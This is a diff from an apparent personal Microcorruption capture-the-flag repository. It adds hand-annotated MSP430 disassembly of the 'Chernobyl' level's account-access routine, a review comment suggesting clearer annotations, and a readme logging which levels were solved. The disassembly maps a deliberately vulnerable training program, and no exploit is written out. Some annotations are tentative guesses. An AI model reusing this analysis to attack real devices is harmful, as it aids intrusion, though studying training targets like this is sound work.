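+4b82: 3f40 384a mov #0x4a38, r15
+4b86: b012 504d call #0x4d50 <puts>
+4b8a: 3f40 584a mov #0x4a58, r15
+4b8e: b012 504d call #0x4d50 <puts>
+4b92: 3f40 954a mov #0x4a95, r15
+4b96: b012 504d call #0x4d50 <puts>
+
+; zero out the stack buffer allocated above
+4b9a: 0e43 clr r14
+4b9c: 3740 ff05 mov #0x5ff, r7
+4ba0: 053c jmp $+0xc <run+0x46>
+; run+0x3c
+4ba2: 0f41 mov sp, r15
+4ba4: 0f5e add r14, r15
+4ba6: cf43 0000 mov.b #0x0, 0x0(r15)
+4baa: 1e53 inc r14
+; run+0x46:
+4bac: 079e cmp r14, r7
+4bae: f937 jge $-0xc <run+0x3c>
+
+; get 0x550 characters -> stack buffer
+4bb0: 3e40 5005 mov #0x550, r14
+4bb4: 0f41 mov sp, r15
+4bb6: b012 404d call #0x4d40 <getsn>
+; run+0x54:
+4bba: 0b41 mov sp, index
+4bbc: 923c jmp $+0x126 <run+0x17c>
+; check for 'a'
+__access_check:
+4bbe: 7f90 6100 cmp.b #0x61, r15
+4bc2: 3a20 jnz $+0x76 <run+0xd2> ; __access%20_check
+4bc4: 0e4b mov index, r14
+4bc6: 3e50 0700 add #0x7, r14
+4bca: 0b4e mov r14, index
+4bcc: 073c jmp $+0x10 <run+0x76>
+; run+0x68:
+; check for ' '
+4bce: 7f90 2000 cmp.b #0x20, r15
+4bd2: 0320 jnz $+0x8 <run+0x74>
+4bd4: cb43 0000 mov.b #0x0, 0x0(index)
+4bd8: 043c jmp $+0xa <run+0x7c>
+4bda: 1b53 inc index
+; run+0x76:
+4bdc: 6f4b mov.b @index, r15
+4bde: 4f93 tst.b r15
+4be0: f623 jnz $-0x12 <run+0x68>
+; run+0x7c:
+4be2: 1b53 inc index
+4be4: 0a43 clr r10
+4be6: 0b3c jmp $+0x18 <run+0x98>
+; run+0x82:
+; r13 =
+4be8: 0d4a mov r10, r13
+4bea: 0d5d add r13, r13
+4bec: 0d5d add r13, r13
+4bee: 0d5a add r10, r13
+4bf0: 0d5d add r13, r13
+
+4bf2: 6a4b mov.b @index, r10
+4bf4: 8a11 sxt r10
+4bf6: 3a50 d0ff add #0xffd0, r10
+4bfa: 0a5d add r13, r10
+4bfc: 1b53 inc index
+; run+0x98:
+4bfe: 6f4b mov.b @index, r15
+4c00: 4f93 tst.b r15
+4c02: 0324 jz $+0x8 <run+0xa4>
+; check for ';'
+4c04: 7f90 3b00 cmp.b #0x3b, r15
+4c08: ef23 jnz $-0x20 <run+0x82>
+; run+0xa4:
+4c0a: 0f48 mov r8, r15
+4c0c: b012 cc49 call #0x49cc <get_from_table>
+4c10: 3f93 cmp #-0x1, r15
+4c12: 0320 jnz $+0x8 <run+0xb4>
+; No such box.
+4c14: 3f40 964a mov #0x4a96, r15
+4c18: 413c jmp $+0x84 <run+0x136>
+4c1a: 0aef xor r15, r10
+4c1c: 3af0 ff7f and #0x7fff, r10
+4c20: 0820 jnz $+0x12 <run+0xcc>
+4c22: 0f9a cmp r10, r15
+4c24: 0334 jge $+0x8 <run+0xc6>
+; Access granted
+4c26: 3f40 a34a mov #0x4aa3, r15
+4c2a: 383c jmp $+0x72 <run+0x136>
+; Access granted, but account not activated.
+4c2c: 3f40 b34a mov #0x4ab3, r15
+4c30: 353c jmp $+0x6c <run+0x136>
+; Aceess denied [sic]
+4c32: 3f40 de4a mov #0x4ade, r15
+4c36: 323c jmp $+0x66 <run+0x136>
+; run+0xd2:
+; check for 'n'
+__n_check:
+4c38: 7f90 6e00 cmp.b #0x6e, r15
+4c3c: 4020 jnz $+0x82 <run+0x158>
+4c3e: 094b mov index, r9
+4c40: 2952 add #0x4, r9
+4c42: 0b49 mov r9, index
+4c44: 073c jmp $+0x10 <run+0xee>
+; run+0xe0
+; check for ' '
+4c46: 7f90 2000 cmp.b #0x20, r15
+4c4a: 0320 jnz $+0x8 <run+0xec>
+4c4c: cb43 0000 mov.b #0x0, 0x0(index) ; if next char is space, skip it
+4c50: 043c jmp $+0xa <run+0xf4>
+; run+0xec
+4c52: 1b53 inc index
+4c54: 6f4b mov.b @index, r15
+4c56: 4f93 tst.b r15
+4c58: f623 jnz $-0x12 <run+0xe0>
+4c5a: 1b53 inc index
+4c5c: 0a43 clr r10
+4c5e: 0b3c jmp $+0x18 <run+0x110>
+
+_to_decimal: ; convert the ascii in r10 to decimal?
+4c60: 0c4a mov r10, r12
+4c62: 0c5c add r12, r12 ; x2
+4c64: 0c5c add r12, r12 ; x4
+4c66: 0c5a add r10, r12 ; x5
+4c68: 0c5c add r12, r12 ; xA
+4c6a: 6a4b mov.b @index, r10
+4c6c: 8a11 sxt r10
+; Subtract 0x30
+4c6e: 3a50 d0ff add #0xffd0, r10
+4c72: 0a5c add r12, r10
+4c74: 1b53 inc index
+; run+0x110
+4c76: 6f4b mov.b @index, r15
+4c78: 4f93 tst.b r15
+4c7a: 0324 jz $+0x8 <run+0x11c>
+
+; check for ';'
+4c7c: 7f90 3b00 cmp.b #0x3b, r15
+4c80: ef23 jnz $-0x20 <run+0xfa>
+4c82: 0a93 tst r10
+4c84: 0334 jge $+0x8 <run+0x126>
+
+; Can not have pin with high bit set
+4c86: 3f40 ec4a mov #0x4aec, r15
+4c8a: 083c jmp $+0x12 <run+0x136>
+
+4c8c: 0e49 mov r9, r14
+4c8e: 0f48 mov r8, r15
+4c90: b012 cc49 call #0x49cc <get_from_table>
+4c94: 3f93 cmp #-0x1, r15
+4c96: 0524 jz $+0xc <run+0x13c>
+; User already has an account
+4c98: 3f40 124b mov #0x4b12, r15
+4c9c: b012 504d call #0x4d50 <puts>
+4ca0: 1c3c jmp $+0x3a <run+0x174>
+
+add_user_account:
+4ca2: 0a12 push r10
+4ca4: 0912 push r9
+4ca6: 3012 2f4b push #0x4b2f
+4caa: b012 4844 call #0x4448 <printf>
+4cae: 3150 0600 add #0x6, sp
+4cb2: 0d4a mov r10, r13
+4cb4: 0e49 mov r9, r14
+4cb6: 0f48 mov r8, r15
+4cb8: b012 3248 call #0x4832 <add_to_table>
+4cbc: 0e3c jmp $+0x1e <run+0x174> ; NOT strings
+; end of the function:
+4cbe: 3f40 544b mov #0x4b54, r15
+4cc2: b012 504d call #0x4d50 <puts>
+failure_case:
+4cc6: 1f43 mov #0x1, r15
+4cc8: 3150 0006 add #0x600, sp
+run_end:
+4ccc: 3741 pop r7
+4cce: 3841 pop r8
+4cd0: 3941 pop r9
+4cd2: 3a41 pop r10
+4cd4: 3b41 pop index
+4cd6: 3041 ret
+
+; loop_end
+4cd8: 1b53 inc index
+; check for ';'
+4cda: fb90 3b00 0000 cmp.b #0x3b, 0x0(index)
+4ce0: fb27 jz $-0x8 <run+0x172>
+; end of the loop
+; run+0x17c:
+4ce2: 6f4b mov.b @index, r15
+4ce4: 4f93 tst.b r15
+4ce6: 6b23 jnz $-0x128 <run+0x58> ; 4bbe
+; cleanup
+4ce8: 0e43 clr r14
+4cea: 603f jmp $-0x13e <run+0x46>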
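Review bot: The `_to_decimal:` label comment still ends in a question mark, but the block it heads is unambiguous from the annotated arithmetic (`x2`, `x4`, `x5`, `xA`, then `add #0xffd0` to strip ASCII '0'): each pass does `r10 = r10 * 10 + (byte - '0')` and the loop at 0x4c76–0x4c80 runs until a NUL or ';', so suggest `; parse decimal digits at index into r10: r10 = r10*10 + (c - '0'), stop at NUL or ';'`. The identical sequence at 0x4be8–0x4bfa is headed by the unfinished `; r13 =`, which should read `; r13 = r10 * 10` so the two loops are visibly the same routine. The branch comment `; __access%20_check` at 0x4bc2 looks like a URL-encoded paste artifact; the target `run+0xd2` is the `__n_check:` label at 0x4c38, so `; -> __n_check` would be accurate. `; NOT strings` at 0x4cbc and the bare `; 4bbe` on 0x4ce6 are terse enough that a few words on what each is pointing out would help the next reader.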
BIN
17 - Chernobyl/memory.bin
Normal file
BIN
17 - Chernobyl/memory.bin
Normal file
Binary file not shown.
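--- /dev/null
+++ b/readme.md
@@ -0,0 +1,33 @@
+# WARNING: SPOILERS AHEAD
+# [Micro Corruption](https://microcorruption.com/) Solutions and Progress
+
+This repo is for keeping track of my Microcorruption progress, and organizing my solutions.
+As of the time of writing, i'm on Chernobyl, and working slowly but surely towards a solution.
+Hopefully in the coming weeks I'll learn enough about malloc and free to get something done on it!
+
+## Timeline of Events:
+
+### 2022 Jul 28 PM:
+Tutorial
+New Orleans
+Sydney
+### 2022 Jul 29 AM:
+Hanoi
+Cusco
+Reykjavik
+Whitehorse
+Montevideo
+Johannesberg
+Santa Cruz
+### 2022 Jul 29 PM:
+Jakarta
+Addis Ababa
+Novosibirsk
+Algiers
+### 2022 Jul 30 AM:
+Vladivostok
+Bangalore
+### 2022 Jul 31 AM:
+Lagos
+### 2022 Jul 31 PM - Present Day:
+Chernobyl (ongoing)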